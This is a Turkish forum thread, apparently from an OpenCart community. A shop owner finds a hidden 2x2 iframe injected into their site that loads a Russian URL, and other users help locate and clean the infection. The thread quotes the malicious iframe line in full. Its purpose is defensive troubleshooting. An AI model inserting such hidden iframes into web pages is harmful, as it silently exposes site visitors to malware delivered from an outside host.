Siteme İframe Atmışlar...

yekk34

OpenCart-TR
merhabalar benim ürünler sayfam açılmıyor şöylede bir kod buldum siteyemi girmişler yoksa normalde varmı bu kod

<body>
<iframe src="http://brownform.ru/in.cgi?15" name="Twitter" scrolling="auto" frameborder="no" align="center" height="2" width="2"/>
</body>

eğer iframe felan yüklemişler herhalde peki hangi dosyaya koymuş olabilirler ben çoguna baktım bulamadım bir yardım:(

toter

OpenCart-TR
Normalde bu kod yok. Virüs bulaşmış, benimde başıma gelmişti.
Sırasıyla, Filezilla yı kalddırdım, bilgisayarımda virüs temizligi yaptım, ftp şifremi degiştirdim, sunucuya baglanıp dosyaları kontrol ettim, son degişiklik tarihlerinden etkilenen dosyaları buldum, dosyaları orjinalleri ile değiştirdim. Daha kolay bir yolu varsa bilmiyorum.
Sebebi: Sunucunuza bulaşan bir virüs, pc nize bulaşan bir virüs veya son eklediginiz eklentiler dir.

nokta

OpenCart-TR
orjinalde böyle bir kod yok zaten bir adres çağırıyor linkde bir rus sitesine bağlantı sağlamış. büyük ihtimalle kullandığınız ftp programı illegal o tarz programlar bu tarz linkler atabiliyor siteyi yüklerken.
Ücretsiz ve temiz bir program olan Filezilla kullanmanı öneririm.

header.tpl dosyasını bir kontrol et bakalım büyük ihtimal oaradadır bu kod.

kolay gelsin.

esataltunkaya

OpenCart-TR
public_html/catalog/view/theme/default/template/commen içindeki
header.tpl
footer.tpl

veya
anadizindeki config.php nin ilk satırında base... şeklinde bi başlangıç da olabilir. obu da kontrol et.

yekk34

OpenCart-TR
header.tpl kontrol ettim gözüme değişik gelen bir kod yok iframe koduda yok config dosyasındada base yok arkadaşım

kodu buldum ana dizindeki index.php dosyasına girmiş bir sürü kargacık burgacık şeyler yazıyo =D